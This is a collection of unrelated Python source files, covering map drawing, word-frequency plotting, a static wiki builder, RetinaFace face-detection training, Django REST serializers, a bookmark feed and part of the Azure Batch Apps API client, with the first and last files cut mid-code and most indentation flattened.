y_hard = onehot_from_logits(y)
y = (y_hard - y).detach() + y
return y
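# Minimal usage sketch (logits of shape [batch_size, n_class]; values are illustrative):
#   logits = torch.randn(4, 8)
#   soft_sample = gumbel_softmax(logits, temperature=0.5)             # rows sum to 1, fully differentiable
#   hard_sample = gumbel_softmax(logits, temperature=0.5, hard=True)  # one-hot forward pass, soft gradients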
def draw_map(file_name, json_path, save_path):
"""
generate map picture of the "file_name.json", and save it into save_path
:param file_name:
:param json_path:
:param save_path:
:return: None
"""
meter2pixel = 100
border_pad = 25
print("Processing ", file_name)
with open(json_path + '/' + file_name + '.json') as json_file:
json_data = json.load(json_file)
# Draw the contour
    verts = (np.array(json_data['verts']) * meter2pixel).astype(int)
x_max, x_min, y_max, y_min = np.max(verts[:, 0]), np.min(verts[:, 0]), np.max(verts[:, 1]), np.min(verts[:, 1])
cnt_map = np.zeros((y_max - y_min + border_pad * 2,
x_max - x_min + border_pad * 2))
verts[:, 0] = verts[:, 0] - x_min + border_pad
verts[:, 1] = verts[:, 1] - y_min + border_pad
cv2.drawContours(cnt_map, [verts], 0, 255, -1)
# Save map
if not os.path.exists(save_path):
os.mkdir(save_path)
cv2.imwrite(save_path + "/" + file_name + '.png', cnt_map)
def draw_maps(map_ids, json_path, save_path):
json_path = os.path.join(os.getcwd(),json_path)
save_path = os.path.join(os.getcwd(),save_path)
for map_id in map_ids:
draw_map(map_id,json_path,save_path)
print('Draw the map successfully.')
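# Example call (paths and map ids are illustrative; each json file must contain the 'verts' field
# expected by draw_map):
#   draw_maps(['map_0001', 'map_0002'], json_path='json_maps', save_path='png_maps')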
|
from plotly.offline import plot
from plotly.graph_objs import Figure, Scatter, Marker, Line
import plotly.graph_objs as go
all_ranks = []
frequent_ranks = [] # for elements occurring at least twice
frequencies = []
rankfrequ = []
words = []
rank = 1
with open('frequencies.dat', "r") as ins:
for line in ins: # (2190,the)
line = line.strip()
pair = line.split(',')
frequency = int(pair[0][1:]) # remove (
word = pair[1][0:-1] # remove )
all_ranks.append(rank)
frequencies.append(frequency)
if frequency > 1:
frequent_ranks.append(rank)
rank_frequ = rank * frequency
rankfrequ.append(rank_frequ)
words.append(word)
rank += 1
rank_frequ = go.Scatter(
x=all_ranks,
y=frequencies,
mode='lines+markers',
name='rank_frequencies',
text=words,
textposition='top center',
)
rank_frequ2 = go.Scatter(
x=frequent_ranks,
y=rankfrequ,
mode='lines+markers',
name='rank_frequencies',
text=words,
textposition='top center',
)
rank_frequ_data2 = [rank_frequ2]
# rank_frequ_data2 = [rank_frequ, rank_frequ2]
fig2 = Figure(data=rank_frequ_data2)
plot(fig2, filename='rankfrequ_plot.html')
|
import os, frontmatter, markdown, configparser
from jinja2 import Environment, FileSystemLoader, contextfilter, Markup
def markdownfilter(val):
return Markup(markdown.markdown(val))
env = Environment(loader=FileSystemLoader("./templates/"))
env.filters["markdown"]=markdownfilter
config = configparser.ConfigParser()
config.read("config.ini")
assert "neowiki" in config.sections(),"Invalid config file: must have neowiki section"
config = config["neowiki"]
assert "published_path" in config,"Invalid config file: must have published_path directive under neowiki section"
pubdir = config["published_path"]
assert "contributors" in config,"Invalid config file: must have contributors list under neowiki section"
contributors = config["contributors"].split(",")
temp = env.get_template("article.html")
if not os.path.exists("build"):
os.system("mkdir build; cp -r assets/* build")
articles = os.listdir("articles")
articles = [[os.path.splitext(x)[0],frontmatter.load("articles/"+x)] for x in articles]
articles.sort(key=lambda x: x[1]["title"])
for article in articles:
if article[1]["published"]:
with open("build/"+article[0]+".html","w") as f:
f.write(temp.render(article=article[1],filename=article[0],pubdir=pubdir))
with open("build/index.html","w") as f:
f.write(env.get_template("mainpage.html").render(articles=articles,pubdir=pubdir))
with open("build/contributors.html","w") as f:
f.write(env.get_template("contributors.html").render(contributors=contributors))
|
"""
Define the modelseed variable.
"""
import os
import sys
"""
This has now been abstracted into PyFBA.__init__.py to avoid redundancy
MODELSEED_DIR = ""
if os.path.exists('Biochemistry/ModelSEEDDatabase'):
MODELSEED_DIR = 'Biochemistry/ModelSEEDDatabase'
elif 'ModelSEEDDatabase' in os.environ:
MODELSEED_DIR = os.environ['ModelSEEDDatabase']
else:
sys.stderr.write("Please ensure that you install the Model SEED Database somewhere, and set the environment " +
"variable ModelSEEDDatabase to point to that directory.\n" +
" See INSTALLATION.md for more information\n")
sys.exit(-1)
if not MODELSEED_DIR:
sys.stderr.write("The ModelSEEDDatabase environment variable is not set.\n")
sys.stderr.write("Please install the ModelSEEDDatabase, set the variable, and try again")
sys.exit(-1)
if not os.path.exists(MODELSEED_DIR):
sys.stderr.write("The MODEL SEED directory: {} does not exist.\n".format(MODELSEED_DIR))
sys.stderr.write("Please check your installation.\n")
sys.exit(-1)
sys.stderr.write(f"We are using {MODELSEED_DIR} for our data\n")
"""
|
import argparse
from collections import OrderedDict
from pathlib import Path
from typing import List, Dict, Any
import apex
import numpy as np
import pytorch_lightning as pl
import torch
import torch.nn.functional as F
import yaml
from albumentations.core.serialization import from_dict
from iglovikov_helper_functions.config_parsing.utils import object_from_dict
from iglovikov_helper_functions.metrics.map import recall_precision
from pytorch_lightning.logging import WandbLogger
from torch.utils.data import DataLoader
from torchvision.ops import nms
from retinaface.box_utils import decode
from retinaface.data_augment import Preproc
from retinaface.dataset import FaceDetectionDataset, detection_collate
def get_args():
parser = argparse.ArgumentParser()
arg = parser.add_argument
arg("-c", "--config_path", type=Path, help="Path to the config.", required=True)
return parser.parse_args()
class RetinaFace(pl.LightningModule):
def __init__(self, hparams: Dict[str, Any]):
super().__init__()
self.hparams = hparams
self.model = object_from_dict(self.hparams["model"])
if hparams["sync_bn"]:
self.model = apex.parallel.convert_syncbn_model(self.model)
self.loss_weights = self.hparams["loss_weights"]
self.priors = object_from_dict(self.hparams["prior_box"], image_size=self.hparams["image_size"])
self.loss = object_from_dict(self.hparams["loss"], priors=self.priors)
def setup(self, state=0):
self.preproc = Preproc(img_dim=self.hparams["image_size"][0])
def forward(self, batch: torch.Tensor) -> torch.Tensor:
return self.model(batch)
def train_dataloader(self):
return DataLoader(
FaceDetectionDataset(
label_path=self.hparams["train_annotation_path"],
image_path=self.hparams["train_image_path"],
transform=from_dict(self.hparams["train_aug"]),
preproc=self.preproc,
),
batch_size=self.hparams["train_parameters"]["batch_size"],
num_workers=self.hparams["num_workers"],
shuffle=True,
pin_memory=True,
drop_last=False,
collate_fn=detection_collate,
)
def val_dataloader(self):
return DataLoader(
FaceDetectionDataset(
label_path=self.hparams["val_annotation_path"],
image_path=self.hparams["val_image_path"],
transform=from_dict(self.hparams["val_aug"]),
preproc=self.preproc,
),
batch_size=self.hparams["val_parameters"]["batch_size"],
num_workers=self.hparams["num_workers"],
shuffle=False,
pin_memory=True,
drop_last=True,
collate_fn=detection_collate,
)
def configure_optimizers(self):
optimizer = object_from_dict(
self.hparams["optimizer"], params=[x for x in self.model.parameters() if x.requires_grad]
)
scheduler = object_from_dict(self.hparams["scheduler"], optimizer=optimizer)
self.optimizers = [optimizer]
return self.optimizers, [scheduler]
def training_step(self, batch: Dict[str, torch.Tensor], batch_idx: int) -> Dict[str, Any]:
images = batch["image"]
targets = batch["annotation"]
out = self.forward(images)
loss_localization, loss_classification, loss_landmarks = self.loss(out, targets)
total_loss = (
self.loss_weights["localization"] * loss_localization
+ self.loss_weights["classification"] * loss_classification
+ self.loss_weights["landmarks"] * loss_landmarks
)
logs = {
"classification": loss_classification,
"localization": loss_localization,
"landmarks": loss_landmarks,
"train_loss": total_loss,
"lr": self._get_current_lr(),
}
return OrderedDict(
{
"loss": total_loss,
"progress_bar": {
"train_loss": total_loss,
"classification": loss_classification,
"localization": loss_localization,
},
"log": logs,
}
)
def validation_step(self, batch: Dict[str, torch.Tensor], batch_idx: int) -> Dict[str, Any]:
images = batch["image"]
image_height = images.shape[2]
image_width = images.shape[3]
annotations = batch["annotation"]
file_names = batch["file_name"]
out = self.forward(images)
location, confidence, _ = out
confidence = F.softmax(confidence, dim=-1)
batch_size = location.shape[0]
predictions_coco: List[Dict[str, Any]] = []
scale = torch.from_numpy(np.tile([image_width, image_height], 2)).to(location.device)
for batch_id in range(batch_size):
boxes = decode(
location.data[batch_id], self.priors.to(images.device), self.hparams["test_parameters"]["variance"]
)
scores = confidence[batch_id][:, 1]
valid_index = torch.where(scores > 0.1)[0]
boxes = boxes[valid_index]
scores = scores[valid_index]
boxes *= scale
# do NMS
keep = nms(boxes, scores, self.hparams["val_parameters"]["iou_threshold"])
boxes = boxes[keep, :].cpu().numpy()
if boxes.shape[0] == 0:
continue
scores = scores[keep].cpu().numpy()
file_name = file_names[batch_id]
for box_id, bbox in enumerate(boxes):
x_min, y_min, x_max, y_max = bbox
x_min = np.clip(x_min, 0, x_max - 1)
y_min = np.clip(y_min, 0, y_max - 1)
predictions_coco += [
{
"id": str(hash(f"{file_name}_{box_id}")),
"image_id": file_name,
"category_id": 1,
"bbox": [x_min, y_min, x_max - x_min, y_max - y_min],
"score": scores[box_id],
}
]
gt_coco: List[Dict[str, Any]] = []
for batch_id, annotation_list in enumerate(annotations):
for annotation in annotation_list:
x_min, y_min, x_max, y_max = annotation[:4]
file_name = file_names[batch_id]
gt_coco += [
{
"id": str(hash(f"{file_name}_{batch_id}")),
"image_id": file_name,
"category_id": 1,
"bbox": [
x_min.item() * image_width,
y_min.item() * image_height,
(x_max - x_min).item() * image_width,
(y_max - y_min).item() * image_height,
],
}
]
return OrderedDict({"predictions": predictions_coco, "gt": gt_coco})
def validation_epoch_end(self, outputs: List) -> Dict[str, Any]:
result_predictions: List[dict] = []
result_gt: List[dict] = []
for output in outputs:
result_predictions += output["predictions"]
result_gt += output["gt"]
_, _, average_precision = recall_precision(result_gt, result_predictions, 0.5)
logs = {"epoch": self.trainer.current_epoch, "mAP@0.5": average_precision}
return {"val_loss": average_precision, "log": logs}
def _get_current_lr(self) -> torch.Tensor:
lr = [x["lr"] for x in self.optimizers[0].param_groups][0]
return torch.from_numpy(np.array([lr]))[0].to(self.device)
def main():
args = get_args()
with open(args.config_path) as f:
hparams = yaml.load(f, Loader=yaml.SafeLoader)
pipeline = RetinaFace(hparams)
Path(hparams["checkpoint_callback"]["filepath"]).mkdir(exist_ok=True, parents=True)
trainer = object_from_dict(
hparams["trainer"],
logger=WandbLogger(hparams["experiment_name"]),
checkpoint_callback=object_from_dict(hparams["checkpoint_callback"]),
)
trainer.fit(pipeline)
if __name__ == "__main__":
main()
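# A minimal sketch of the YAML config this script expects; the key names are taken
# from the self.hparams lookups above, and every value shown is a placeholder
# assumption rather than a recommended setting:
#
#   model: {type: some.module.RetinaFaceModel}   # any class object_from_dict can build
#   sync_bn: false
#   image_size: [256, 256]
#   prior_box: {type: some.module.priorbox}
#   loss: {type: some.module.MultiBoxLoss}
#   loss_weights: {localization: 2.0, classification: 1.0, landmarks: 1.0}
#   train_annotation_path: /path/to/train/label.json
#   train_image_path: /path/to/train/images
#   train_aug: {...}                              # serialized albumentations pipeline
#   val_annotation_path: /path/to/val/label.json
#   val_image_path: /path/to/val/images
#   val_aug: {...}
#   train_parameters: {batch_size: 8}
#   val_parameters: {batch_size: 8, iou_threshold: 0.4}
#   test_parameters: {variance: [0.1, 0.2]}
#   num_workers: 4
#   optimizer: {type: torch.optim.SGD, lr: 0.001}
#   scheduler: {type: torch.optim.lr_scheduler.CosineAnnealingLR, T_max: 10}
#   experiment_name: retinaface
#   checkpoint_callback: {type: pytorch_lightning.callbacks.ModelCheckpoint, filepath: checkpoints}
#   trainer: {type: pytorch_lightning.Trainer, gpus: 1, max_epochs: 10}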
|
from .models import Song, User
from rest_framework import serializers
class SongSerializer(serializers.ModelSerializer):
class Meta:
model = Song
fields = ('id', 'title', 'artist', 'album')
class UserSerializer(serializers.ModelSerializer):
song_count = serializers.ReadOnlyField(source='songs.count')
class Meta:
model = User
fields = ('id', 'email', 'full_name', 'song_count')
class IdsSerializer(serializers.Serializer):
ids = serializers.ListField(
child=serializers.IntegerField()
)
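# A minimal usage sketch for IdsSerializer (the values below are illustrative,
# not part of this module); it validates payloads of the form {"ids": [1, 2, 3]}:
#
#   serializer = IdsSerializer(data={"ids": [1, 2, 3]})
#   serializer.is_valid(raise_exception=True)
#   ids = serializer.validated_data["ids"]  # -> [1, 2, 3]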
|
import pystache
from redwind.models import Post
from sqlalchemy import desc
import isodate
FEED_TEMPLATE = """
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>{{{title}}}</title>
<style>
body {
font-family: sans-serif;
max-width:800px;
}
h1,h2,h3,h4 {
font-size: 1em;
}
li {
list-style: none;
}
.p-category {
list-style: none;
border: 1px solid #ddd;
border-radius:2px;
display: inline;
padding: 2px;
margin: 5px;
}
.dt-published {
margin-top:1em;
}
</style>
</head>
<body class="h-feed">
<h1 class="p-name">{{{title}}}</h1>
<ul>
{{#bookmarks}}
<li class="h-entry">
<h2 class="p-bookmark h-cite"><a href="{{bookmark}}">{{title}}</a></h2>
{{#content}}<div class="e-content">{{{.}}}</div>{{/content}}
{{#categories}}<span class="p-category">{{.}}</span>{{/categories}}
<div class="dt-published">{{published}}</div>
</li>
{{/bookmarks}}
</ul>
</body>
</html>
"""
blob = {
'title': 'Kylewm’s Bookmarks',
'bookmarks': []
}
for bmark in Post.query.filter_by(post_type='bookmark').order_by(desc(Post.published)).all():
blob['bookmarks'].append({
'title': bmark.bookmark_contexts[0].title,
'bookmark': bmark.bookmark_of[0],
'content': bmark.content_html,
'categories': [t.name for t in bmark.tags],
'published': isodate.datetime_isoformat(bmark.published),
})
print(pystache.render(FEED_TEMPLATE, blob))
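# Rendering note: pystache HTML-escapes double-mustache tags such as {{bookmark}}
# and {{published}}, while the triple-mustache tags {{{title}}} and {{{.}}} used
# for content_html in the template above are emitted unescaped on purpose.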
|
from dataclasses import dataclass
from datetime import datetime
from . import RepoLanguages
@dataclass
class RepoStats(RepoLanguages):
created_at: datetime
stars: int
forks: int
score: float
def __hash__(self):
return super().__hash__()
def __eq__(self, other):
return super().__eq__(other)
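# Why the explicit dunder methods above matter: a @dataclass with the default
# eq=True generates its own __eq__ and sets __hash__ to None, which would make
# RepoStats unhashable and ignore whatever equality semantics RepoLanguages
# defines; delegating to super() keeps the parent's behaviour intact.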
|
#-------------------------------------------------------------------------
# The Azure Batch Apps Python Client
#
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# The MIT License (MIT)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the ""Software""), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
#--------------------------------------------------------------------------
""" Client for the Batch Apps Management API.
"""
from batchapps import rest_client
from batchapps.files import UserFile
from batchapps import utils
from batchapps.exceptions import (
RestCallException,
FileMissingException)
import logging
API_VERSION = "2014-10-01-preview"
class Response(object):
"""
A simple container object for the response of the REST call.
:Attributes:
- success (bool)
- result
"""
def __init__(self, success, output=None):
"""
:Args:
- success (bool): Whether the REST call completed successfully and
returned an applicable result.
:Kwargs:
- output: The response from the REST client. This could be the
result of a successful API call, or it could hold exception
information for a failed call. Defaults to None.
"""
self.success = success
self.result = output
class BatchAppsApi(object):
"""
Specification of Batch Apps Management API, abstracted away
from the implementation of the :mod:`rest_client`.
This class should directly reflect the full functionality of the API,
without adding any additional layers of data processing.
:Attributes:
- headers (dict)
"""
def __init__(self, credentials, config):
"""
Create new API client:
:Args:
- credentials (:class:`.Credentials`): Credentials with which all
API calls will be authenticated.
- config (:class:`.Configuration`): Configuration of the
job type the jobs will be submitted as, as well as endpoint
and logging configuration.
"""
self._config = config
self._log = logging.getLogger('batch_apps')
self._auth = credentials
self.headers = {"Accept": "application/json",
"x-ms-version": API_VERSION,
"Content-Type": "application/json"}
def app(self):
"""
.. warning:: Deprecated. Use :meth:`.jobtype()`.
Retrieve the current jobtype from the :class:`.Configuration`.
:Returns:
- The current job type from the configuration (str).
"""
self._log.warning("app() is deprecated. "
"Please use jobtype().")
return self._config.current_jobtype()
def jobtype(self):
"""
Retrieve the current jobtype from the :class:`.Configuration`.
:Returns:
- The current jobtype from the configuration (str).
"""
return self._config.current_jobtype()
def url(self, api_call):
"""Format API endpoint URL.
:Args:
- api_call (str): the URL of the method that will be appended to
the root URL provided by the :class:`.Configuration`.
:Returns:
- The complete, formatted URL (str)
"""
end_p = self._config.endpoint()
self._log.debug("Formatting URL: https://{endpoint}/api/{api}".format(
endpoint=end_p,
api=api_call))
return "https://{endpoint}/api/{api}".format(
endpoint=end_p,
api=api_call)
def default_params(self):
"""
Get the default parameters for the job type.
Retrieves the parameters tied to the job type from the
:class:`.Configuration`
:Returns:
- Dictionary of strings of the configured parameters
"""
return self._config.default_params()
def list_jobs(self, index=0, per_call=10, name=None):
"""Lists the users jobs.
:Kwargs:
- index (int): The starting index from which the list of jobs will
be returned. The default is 0, i.e. return all jobs from the
start.
- per_call (int): The number of job entries from ``index`` to
return. The default is 10.
- name (str): Return only the jobs whose name contains the given
string. The default is None.
:Returns:
- :class:`.Response` object containing success of call. If
successful, the ``Response.result`` will contain a list of
jobs as dictionaries. If failed, ``Response.result`` will
hold the :exc:`.RestCallException`.
"""
self._log.debug("list_jobs, index={0}, per_call={1}, name={2}".format(
index,
per_call, name))
url = self.url("jobs")
req_set = {"maxResults": per_call, "startIndex": index}
if name:
req_set["nameContains"] = str(name)
try:
get_resp = rest_client.get(self._auth, url,
self.headers,
params=req_set)
except RestCallException as exp:
return Response(False, exp)
else:
if 'jobs' in get_resp:
return Response(True, get_resp)
return Response(
False,
RestCallException(KeyError,
"Key not in response message",
get_resp))
def get_job(self, job_id=None, url=None):
"""
Gets information about a job.
Job info can be retrieved by supplying **either** the job's ID
**or** a URL to the job. If both are supplied, URL is used.
:Kwargs:
- job_id (str): ID of the job on which info is requested.
- url (str): A complete URL to the job info.
:Returns:
- A :class:`.Response` object containing the job details as a
dictionary, if successful. Otherwise the Response will
contain the :exc:`.RestCallException`.
:Raises:
- :class:`.RestCallException` if neither job ID nor URL is
supplied.
- :class:`.RestCallException` if job details dictionary is
malformed / missing necessary keys
"""
self._log.debug("get_job, job_id={0}, url={1}".format(job_id, url))
if not url and job_id:
url = self.url("jobs/{jobid}").format(jobid=job_id)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
if utils.valid_keys(get_resp, ['id', 'name', 'type']):
return Response(True, get_resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted job response",
get_resp))
def send_job(self, job_message):
"""Submits a job.
:Args:
- job_message (dict): A job specification formatted as a
dictionary.
:Returns:
- A :class:`.Response` object containing a dictionary of the newly
submitted job's ID and URL if successful. Otherwise the
Response will contain the :exc:`.RestCallException`.
:Raises:
- :class:`.RestCallException` if new job dictionary is
malformed / missing necessary keys.
"""
self._log.debug("send_job, job_message={0}".format(job_message))
url = self.url("jobs")
try:
post_resp = rest_client.post(self._auth,
url,
self.headers,
message=job_message)
except RestCallException as exp:
return Response(False, exp)
else:
if utils.valid_keys(post_resp, ['jobId', 'link']):
return Response(True, post_resp)
return Response(
False,
RestCallException(KeyError,
"incorrectly formatted job response",
post_resp))
def get_log(self, job_id, start=None, max_lines=100):
"""
Gets log messages for a job.
These are the Batch Apps system logs, rather than those of the
application.
:Args:
- job_id (str): The ID of the job on which to download the logs.
:Kwargs:
- start (str): The start time from which the logs will be
downloaded. If not specified, the default is from the
beginning of the job.
- max_lines (int): The max number of logging messages to retrieve.
The default is 100. If set to ``None``, all messages from start
time will be retrieved.
:Returns:
- A :class:`.Response` object with a dictionary containing the
timestamp of the most recent message returned and a list of
the log messages, represented as dictionaries, with the message
text, timestamp and task id that the message applies to.
- If the call failed, the response contains the
:class:`.RestCallException`.
"""
self._log.debug("get_log, job_id={0}, start={1}, max_lines={2}".format(
job_id,
start,
max_lines))
url = self.url("jobs/{jobid}/log").format(jobid=job_id)
get_params = {}
if start:
get_params['since'] = str(start)
if max_lines:
get_params['maxResults'] = int(max_lines)
try:
get_resp = rest_client.get(self._auth,
url,
self.headers,
params=get_params)
except RestCallException as exp:
return Response(False, exp)
else:
#TODO: Check for specific keys here.
return Response(True, get_resp)
def cancel(self, job_id):
"""Cancels a running job.
:Args:
- job_id (str): The ID of the job to be cancelled.
:Returns:
- A :class:`.Response` object with the POST response, however this
is not required if the call is successful. The call will only
be successful if the job can be and is cancelled.
- If the job is not running (and therefore cannot be cancelled),
the call will fail and the :class:`.RestCallException` will be
returned in the :class:`.Response` object.
- Any other communication failures will also return a
:class:`.RestCallException`.
"""
self._log.debug("cancel, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/actions/cancel").format(jobid=job_id)
try:
post_resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, post_resp)
def reprocess(self, job_id):
"""
Reprocesses any failed tasks in the job.
This call will also re-activate a job if it has a 'Failed' status.
:Args:
- job_id (str): ID of the job to be reprocessed.
:Returns:
- A :class:`.Response` object containing a dictionary with the job
ID of the reprocessed job and a URL to retrieve the job
information (see :meth:`.BatchAppsApi.get_job()`).
- If the call failed the response will hold the
:class:`.RestCallException`.
"""
self._log.debug("reprocess, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/actions/reprocess").format(jobid=job_id)
try:
post_resp = rest_client.post(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, post_resp)
def list_outputs(self, job_id):
"""
Lists the output files produced by a job.
This method will only list final outputs of the job, created by a
Merge Task.
To retrieve a list of all files created by all tasks of the job use
:meth:`.list_output_files()`.
Can be used to ascertain the output filenames before calling the
generic output download URL.
:Args:
- job_id (str): ID of the job whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with
the 'name' and 'type' of the output as well as a download
'link'. Contained in a :class:`.Response`. If the call failed,
Response will contain the :class:`.RestCallException`.
"""
self._log.debug("list_outputs, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/outputs").format(jobid=job_id)
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if ('jobOutputs' not in get_resp
or not isinstance(get_resp['jobOutputs'], list)):
return Response(
False,
RestCallException(KeyError,
"jobOutputs key not in response message",
get_resp))
# Reformat output dictionary to be more manageable
for output in get_resp['jobOutputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def get_output(self,
download_dir,
size,
fname,
overwrite,
job_id=None,
otype='output',
url=None,
callback=None,
block=4096):
"""
Gets the content of the job output or its thumbnail.
Either ``url``, or both ``job_id`` and ``otype`` must be set.
If all three are set, URL will be used.
:Args:
- download_dir (str): The full path to the directory where the
output will be downloaded to.
- size (int): The size in bytes of the file to be downloaded.
Used for progress reporting.
- fname (str): The name of the output file to be downloaded.
- overwrite (bool): Whether to overwrite an existing file if
present.
:Kwargs:
- job_id (str): The ID of the job whose output will be downloaded.
The default is None.
- otype (str): The type of output to be downloaded, must be a
string in ``['output', 'preview']``.
- url (str): The URL directly to the file to be downloaded. If
supplied, ``job_id`` and ``otype`` will not be used.
The default is None.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct
URL arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug(
"get_output, download_dir={dd}, size={sz}, fname={fn}, "
"overwrite={ow}, job_id={ji}, url={ur}, otype={ot}, block={bl}".format(
dd=download_dir,
sz=size,
fn=fname,
ow=overwrite,
ji=job_id,
ur=url,
ot=otype,
bl=block))
if not url and job_id:
if otype.lower() not in ['output', 'preview']:
return Response(
False,
RestCallException(
ValueError,
"output type must be 'output' or 'preview'",
None))
url = self.url("jobs/{jobid}/outputs/{type}").format(jobid=job_id,
type=otype)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size,
overwrite,
f_name=fname,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def props_output(self, job_id=None, otype='output', url=None):
"""
Gets the properties of the job output or preview.
Used to obtain the size of the final job output or its thumbnail,
which is returned in the response Content Length header.
Either ``url``, or both ``job_id`` and ``otype`` must be set (although
``otype`` is already set by default).
If all three are set, URL will be used.
:Kwargs:
- job_id (str): The ID of the job whose output will be checked.
The default is None.
- otype (str): The type of output to be checked, must be a
string in ``['output', 'preview']``.
- url (str): The URL directly to the file to be checked. If
supplied, ``job_id`` and ``otype`` will not be used.
The default is None.
:Returns:
- :class:`.Response` with the requested output size in bytes (int)
if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct URL
arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("props_output, job_id={0}, "
"otype={1}, url={2}".format(job_id, otype, url))
if not url and job_id:
if otype not in ['output', 'preview']:
return Response(
False,
RestCallException(
ValueError,
"output type must be 'output' or 'preview'",
None))
url = self.url("jobs/{jobid}/outputs/{type}").format(jobid=job_id,
type=otype)
elif not url and not job_id:
return Response(
False,
RestCallException(AttributeError,
"Either job_id or url must be set",
None))
try:
head_resp = rest_client.head(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, head_resp)
def list_output_files(self, job_id):
"""Lists the intermediate output files produced during a job.
:Args:
- job_id (str): The ID of the job whose outputs will be listed.
:Returns:
- A list of the outputs represented as dictionaries, each with the
'name' and 'type' of the output as well as a download 'link'.
Contained in a :class:`.Response`. If the call failed, Response
will contain the :class:`.RestCallException`.
"""
self._log.debug("list_output_files, job_id={0}".format(job_id))
url = self.url("jobs/{jobid}/outputs/files").format(jobid=job_id)
try:
get_resp = rest_client.get(self._auth, url, self.headers)
except RestCallException as exp:
return Response(False, exp)
outputs = []
if ('outputs' not in get_resp
or not isinstance(get_resp['outputs'], list)):
return Response(False,
RestCallException(
KeyError,
"outputs key not in response message",
get_resp))
for output in get_resp['outputs']:
outputs.append({
'name': output.get('name'),
'link': output.get('link', {'href':None}).get('href'),
'type': output.get('kind')
})
return Response(True, outputs)
def get_output_file(self,
download_dir,
size,
overwrite,
job_id=None,
fname=None,
url=None,
callback=None,
block=4096):
"""
Gets the content of a file created in a job.
Either ``url``, or both ``job_id`` and ``fname`` must be set.
If all three are set, job_id & fname will be used.
:Args:
- download_dir (str): The full path to the directory where the
output will be downloaded to.
- size (int): The size in bytes of the file to be downloaded.
Used for progress reporting.
- overwrite (bool): Whether to overwrite an existing file if
present.
:Kwargs:
- job_id (str): The ID of the job whose output will be downloaded.
The default is None.
- fname (str): The name of the output file to be downloaded.
- url (str): The URL directly to the file to be downloaded.
The default is None.
- callback (func): A function to be called to report download progress.
The function must take three arguments: the percent downloaded (float), the
bytes downloaded (float), and the total bytes to be downloaded (float).
- block (int): The amount of data downloaded in each block - determines
the frequency with which the callback is called. Default is 4096.
:Returns:
- :class:`.Response` with the GET response, however this is not
required if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct URL
arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("get_output_file, download_dir={dd}, size={sz}, "
"overwrite={ow}, job_id={ji}, fname={fn}, "
"url={ur}, block={bl}".format(dd=download_dir,
sz=size,
ow=overwrite,
ji=job_id,
fn=fname,
ur=url,
bl=block))
name = fname if fname else None
if job_id and name:
url = self.url("jobs/{jobid}/outputs/files/{name}")
url = url.format(jobid=job_id, name=name)
elif url is None:
return Response(
False,
RestCallException(
AttributeError,
"Either output url or job id and filename required.",
None))
try:
get_resp = rest_client.download(self._auth,
url,
self.headers,
download_dir,
size, overwrite,
f_name=name,
block_size=block,
callback=callback)
except RestCallException as exp:
return Response(False, exp)
else:
return Response(True, get_resp)
def props_output_file(self, job_id=None, fname=None, url=None):
"""
Get the file size of a given task output.
Used to obtain the size of the requested file, which is returned in
the response Content Length header. Either ``url``, or both ``job_id``
and ``fname`` must be set. If all three are set, job_id & fname will
be used.
:Kwargs:
- job_id (str): The ID of the job whose output will be checked.
The default is None.
- fname (str): The name of the output file to be downloaded.
- url (str): The URL directly to the file to be checked.
The default is None.
:Returns:
- :class:`.Response` with the requested output size in bytes (int)
if the call was successful.
- :class:`.Response` with :exc:`AttributeError` if the correct
URL arguments are not supplied.
- :class:`.Response` with :class:`.RestCallException` if the
download failed.
"""
self._log.debug("props_output_file, job_id={0}, "
"fname={1}, url={2}".format(job_id, fname, url))
if job_id and fname:
url = self.url("jobs/{jobid}/outputs/files/{name}")
